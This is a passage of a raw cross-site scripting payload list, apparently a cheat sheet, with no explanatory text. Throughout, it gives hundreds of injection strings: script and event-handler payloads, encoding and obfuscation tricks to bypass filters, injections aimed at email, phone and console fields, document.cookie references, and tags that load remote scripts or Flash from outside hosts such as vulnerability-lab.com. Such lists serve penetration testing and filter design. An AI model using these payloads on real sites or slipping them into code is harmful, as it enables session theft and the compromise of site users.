codebase="javascript:document.cookie=true;"> -1<style><!--</style><script>document.cookie=true;//--></script> -1<<script>document.cookie=true;</script> -1<script>document.cookie=true;//--></script> -1<!-- -- --><script>document.cookie=true;</script><!-- -- --> -1<img src="blah"onmouseover="document.cookie=true;"> -1<img src="blah>" onmouseover="document.cookie=true;"> -1<xml src="javascript:document.cookie=true;"> -1<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml> -1<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script> Cross Site Scripting Strings Restriction Bypass Mail: >"<iframe src=http://vulnerability-lab.com/>@gmail.com >"<script>alert(document.cookie)</script><div style="1@gmail.com >"<script>alert(document.cookie)</script>@gmail.com <iframe src=http://vulnerability-lab.com/>@gmail.com <script>alert(document.cookie)</script><div style="1@gmail.com <script>alert(document.cookie)</script>@gmail.com Cross Site Scripting Strings Restriction Bypass Phone: +49/>"<iframe src=http://vulnerability-lab.com>1337 "><iframe src='' onload=alert('mphone')> <iframe src=http://vulnerability-lab.com>1337+1 Cross Site Scripting Strings Restriction Bypass Obfuscation >“<ScriPt>ALeRt("VlAb")</scriPt> >"<IfRaMe sRc=hTtp://vulnerability-lab.com></IfRaMe> Cross Site Scripting Strings Restriction Bypass String to Charcode <html><body> <button.onclick="alert(String.fromCharCode(60,115,99,114,105,112,116,62,97,108, 101,114,116,40,34,67,114,111,115,115,83,105,116,101,83,99,114,105,112,116,105,1 10,103,64,82,69,77,79,86,69,34,41,60,47,115,99,114,105,112,116,62));">String:fr om.Char.Code</button></body></html> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//\";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 
116, 105, 110, 103))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))</SCRIPT> '';!--"<CrossSiteScripting>=&{()} Cross Site Scripting Strings Restriction Bypass encoded frame url %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%43%72%6F %73%73%53%69%74%65%53%63%72%69%70%74%69%6E%67%32%22%29%3C%2F %73%63%72%69%70%74%3E Cross Site Scripting Strings via Console: set vlan name 1337 <script>alert(document.cookie)</script> set system name <iframe src=http://www.vulnerability-lab.com> set system location "><iframe src=a onload=alert("VL") < set system contact <script>alert('VL')</script> insert <script>alert(document.cookie)</script> add <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>'"--> add user <script>alert(document.cookie)</script> <script>alert(document.cookie)</script>@gmail.com add topic <iframe src=http://www.vulnerability-lab.com> add name <script>alert('VL')</script> perl -e 'print "<IMG SRC=java\0script:alert(\"CrossSiteScripting\")>";' > out perl -e 'print "<SCR\0IPT>alert(\"CrossSiteScripting\")</SCR\0IPT>";' > out <!--[if gte IE 4]> <SCRIPT>alert('CrossSiteScripting');</SCRIPT> <![endif]--> Cross Site Scripting Strings on per line validation applications: <IMG SRC = " j a v a s c r i p t : a l e r t ( ' V L A B ' ) " > Cross Site Scripting Strings Embed: <EMBED SRC="http://vulnerability-lab.com/CrossSiteScripting.swf" AllowScriptAccess="always"></EMBED> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> <EMBED 
SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> Cross Site Scripting Strings Action Script: <object type="application/x-shockwave-flash" data="http://www.vulnerability-lab.com/hack.swf" width="300" height="300"> <param name="movie" value="http://www.subhohalder.com/xysecteam.swf" /> <param name="quality" value="high" /> <param name="scale" value="noscale" /> <param name="salign" value="LT" /> <param name="allowScriptAccess" value="always" /> <param name="menu" value="false" /> </object> <SCRIPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT> <<SCRIPT>alert("CrossSiteScripting");//<</SCRIPT> <SCRIPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js?<B> <SCRIPT SRC=//vulnerability-lab.com/.js> <SCRIPT>a=/CrossSiteScripting/ alert(a.source)</SCRIPT> <SCRIPT a=">" SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT> <SCRIPT a=`>` SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT> </TITLE><SCRIPT>alert("CrossSiteScripting");</SCRIPT> <IMG SRC="javascript:alert('CrossSiteScripting');"> <IMG SRC=javascript:alert('CrossSiteScripting')> <IMG SRC=JaVaScRiPt:alert('CrossSiteScripting')> <IMG SRC=javascript:alert(&quot;CrossSiteScripting&quot;)> <IMG SRC=`javascript:alert("RM'CrossSiteScripting'")`> <IMG """><SCRIPT>alert("CrossSiteScripting")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC="jav ascript:alert('CrossSiteScripting');"> <IMG SRC="jav&#x09;ascript:alert('CrossSiteScripting');"> <IMG 
SRC="jav&#x0A;ascript:alert('CrossSiteScripting');"> <IMG SRC="jav&#x0D;ascript:alert('CrossSiteScripting');"> <IMG SRC=" &#14; javascript:alert('CrossSiteScripting');"> <IMG SRC="javascript:alert('CrossSiteScripting')" <IMG DYNSRC="javascript:alert('CrossSiteScripting')"> <IMG LOWSRC="javascript:alert('CrossSiteScripting')"> <IMG SRC='vbscript:msgbox("CrossSiteScripting")'> <IMG SRC="mocha:[code]"> <IMG SRC="livescript:[code]"> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('CrossSiteScripting');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('CrossSiteScripting');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('CrossSiteScripting');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=jAvAsCriPt:aLeRt('CroSsSiteScrIpting');"> <META HTTP-EQUIV="Link" Content="<http://vulnerability-lab.com/CrossSiteScripting.css>; REL=stylesheet"> <META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('CrossSiteScripting')&lt;/SCRIPT&gt;"> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('CrossSiteScripting');+ADw-/SCRIPT+AD4- <OBJECT TYPE="text/x-scriptlet" DATA="http://vulnerability-lab.com/scriptlet.html"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('CrossSiteScripting')></OBJECT> <STYLE>@im\port'\ja\vasc\ript:alert("CrossSiteScripting")';</STYLE> <STYLE>@import'http://vulnerability-lab.com/CrossSiteScripting.css';</STYLE> <STYLE TYPE="text/javascript">alert('CrossSiteScripting');</STYLE> <STYLE>.CrossSiteScripting{background-image:url("javascript:alert('CrossSiteScripting')");}</STYLE><A CLASS=CrossSiteScripting></A> <STYLE 
type="text/css">BODY{background:url("javascript:alert('CrossSiteScripting')")}</STYLE> <STYLE>li {list-style-image: url("javascript:alert('CrossSiteScripting')");}</STYLE><UL><LI>CrossSiteScripting <STYLE>BODY{-moz-binding:url("http://vulnerability-lab.com/CrossSiteScriptingmoz.xml#CrossSiteScripting")}</STYLE> <DIV STYLE="background-image: url(javascript:alert('CrossSiteScripting'))"> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <DIV STYLE="background-image: url(&#1;javascript:alert('CrossSiteScripting'))"> <DIV STYLE="width: expression(alert('CrossSiteScripting'));"> <LAYER SRC="http://vulnerability-lab.com/script.html"></LAYER> <LINK REL="stylesheet" HREF="javascript:alert('CrossSiteScripting');"> <LINK REL="stylesheet" HREF="http://vulnerability-lab.com/CrossSiteScripting.css"> <BODY BACKGROUND="javascript:alert('CrossSiteScripting')"> <BODY ONLOAD=alert('CrossSiteScripting')> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("CrossSiteScripting")> <iframe src=http://vulnerability-lab.com/index.html < <TABLE BACKGROUND="javascript:alert('CrossSiteScripting')"> <TABLE><TD BACKGROUND="javascript:alert('CrossSiteScripting')"> <BGSOUND SRC="javascript:alert('CrossSiteScripting');"> <BR SIZE="&{alert('CrossSiteScripting')}"> <A HREF="http://server.com/">CrossSiteScripting</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">CrossSiteScripting</A> <A HREF="http://1113982867/">CrossSiteScripting</A> <A HREF="javascript:document.location='http://www.vulnerability-lab.com/'">CrossSiteScripting</A> <BASE HREF="javascript:alert('CrossSiteScripting');//"> \";alert('CrossSiteScripting');// <INPUT TYPE="IMAGE" SRC="javascript:alert('CrossSiteScripting');"> <CrossSiteScripting STYLE="behavior: url(CrossSiteScripting.htc);"> ¼script¾alert(¢CrossSiteScripting¢)¼/script¾ <IMG 
STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(alert('CrossSiteScripting'))"> <CrossSiteScripting STYLE="CrossSiteScripting:expression(alert('CrossSiteScripting'))"> exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*"); CrossSiteScripting:&#101;x&#x2F;*CrossSiteScripting*//*/*/pression(alert("CrossSiteScripting"))'> a="get"; b="URL(\""; c="javascript:"; d="alert('CrossSiteScripting');\")"; eval(v+l+a+b); <HTML xmlns:CrossSiteScripting> <?import namespace="CrossSiteScripting" implementation="http://ha.ckers.org/CrossSiteScripting.htc"> <CrossSiteScripting:CrossSiteScripting>CrossSiteScripting</CrossSiteScripting:CrossSiteScripting> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('CrossSiteScripting');">]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <XML ID="CrossSiteScripting"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('CrossSiteScripting')"&gt;</B></I></XML> <SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> <XML SRC="CrossSiteScriptingtest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <HTML><BODY> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" to="CrossSiteScripting&lt;SCRIPT DEFER&gt;alert(&quot;CrossSiteScripting&quot;)&lt;/SCRIPT&gt;"> </BODY></HTML> <SCRIPT SRC="http://vulnerability-lab.com/CrossSiteScripting.jpg"></SCRIPT> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>'"--> <? 
echo('<SCR)'; echo('IPT>alert("CrossSiteScripting")</SCRIPT>'); ?> <IMG SRC="http://www.vulnerability-lab.com/file.php?variables=malicious"> Redirect 302 /vlab.jpg http://vulnerability-lab.com/admin.asp&deleteuser <script>[CDATA[prompt(1);]]</script> <div onclick="setTimeout('prompt(9)',1000)"> eval("prompt(3)") "><img src=x onabort=prompt(1)> "><img src=x oncanplay=prompt(1)> "><img src=x oncanplaythrough=prompt(1)> "><img src=x ondurationchange=prompt(1)> "><img src=x onemptied=prompt(1)> "><img src=x onended=prompt(1)> "><img src=x onerror=prompt(1)> "><img src=x onloadeddata=prompt(1)> "><img src=x onloadedmetadata=prompt(1)> "><img src=x onloadstart=prompt(1)> "><img src=x onpause=prompt(1)> "><img src=x onplay=prompt(1)> "><img src=x onplaying=prompt(1)> "><img src=x onprogress=prompt(1)> "><img src=x onratechange=prompt(1)> "><img src=x onseeked=prompt(1)> "><img src=x onseeking=prompt(1)> "><img src=x onstalled=prompt(1)> "><img src=x onsuspend=prompt(1)> "><img src=x ontimeupdate=prompt(1)> "><img src=x onvolumechange=prompt(1)> "><img src=x onwaiting=prompt(1)> "><img src=x onshow=prompt(1)> "><img src=x onclick=prompt(1)> "><img src=x ondblclick=prompt(1)> "><img src=x ondrag=prompt(1)> "><img src=x ondragend=prompt(1)> "><img src=x ondragenter=prompt(1)> "><img src=x ondragleave=prompt(1)> "><img src=x ondragover=prompt(1)> "><img src=x ondragstart=prompt(1)> "><img src=x ondrop=prompt(1)> "><img src=x onmousedown=prompt(1)> "><img src=x onmousemove=prompt(1)> "><img src=x onmouseout=prompt(1)> "><img src=x onmouseover=prompt(1)> "><img src=x onmouseup=prompt(1)> "><img src=x onmousewheel=prompt(1)> "><img src=x onscroll=prompt(1)> "><img src=x onwheel=prompt(1)> "><img src=x onerror=prompt(1)> [Click here](javascript:alert(1)) "></script><svg/onload=alert("XSS")> <iframe src="http://businessinfo.co.uk/labs/xss/xss.swf"></iframe> '|alert('xss')|' +ADw-script+AD4-alert(document.location)+ADw-/script+AD4- #onmouseover=prompt(1) "><img src=x 
onerror=prompt(1)> <script>alert(1)</script> %3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E &#x3C;&#x69;&#x66;&#x72;&#x61;&#x6D;&#x65;&#x20;&#x73;&#x72;&#x63;&#x3D;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x74;&#x65;&#x73;&#x74;&#x2E;&#x64;&#x65;&#x3E; &#60&#105&#102&#114&#97&#109&#101&#32&#115&#114&#99&#61&#104&#116&#116&#112&#58&#47&#47&#116&#101&#115&#116&#46&#100&#101&#62 PGlmcmFtZSBzcmM9aHR0cDovL3Rlc3QuZGU+ javascript:alert(1) <script> ></SCRIPT> "><img src=x onmousemove=prompt(1)> "><img src=x onmouseout=prompt(1)> "><img src=x onmouseover=prompt(1)> <body onload=prompt(1);> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)> <video><source onerror="javascript:alert(1)"> <marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)> <body > <textarea autofocus onfocus=confirm(1)> <video><source> <body language=vbsonload=alert-1 </textarea>// <body language=vbsonload=alert-1 // Works with IE8 <command onmouseover ="\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B">Save</command> // Works with IE8 <q/oncut=open()> <iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">. 
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4="> <object data="data:text/html;base64,PHNjcmlwdD4NCnNldFRpbWVvdXQobXlGdW5jdGlvbiwgMzAwMDApOw0KZnVuY3Rpb24gbXlGdW5jdGlvbigpIHsNCiAgICBhbGVydCgnaG9nYXJ0aCcpOw0KfQ0KPC9zY3JpcHQ+"> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> <body > <textarea autofocus onfocus=confirm(1)> <video><source> <body language=vbsonload=alert-1 </textarea>// <body language=vbsonload=alert-1 // Works with IE8 <command onmouseover ="\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B">Save</command> // Works with IE8 <q/oncut=open()> <iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">. <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4="> <object data="data:text/html;base64,PHNjcmlwdD4NCnNldFRpbWVvdXQobXlGdW5jdGlvbiwgMzAwMDApOw0KZnVuY3Rpb24gbXlGdW5jdGlvbigpIHsNCiAgICBhbGVydCgnaG9nYXJ0aCcpOw0KfQ0KPC9zY3JpcHQ+"> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>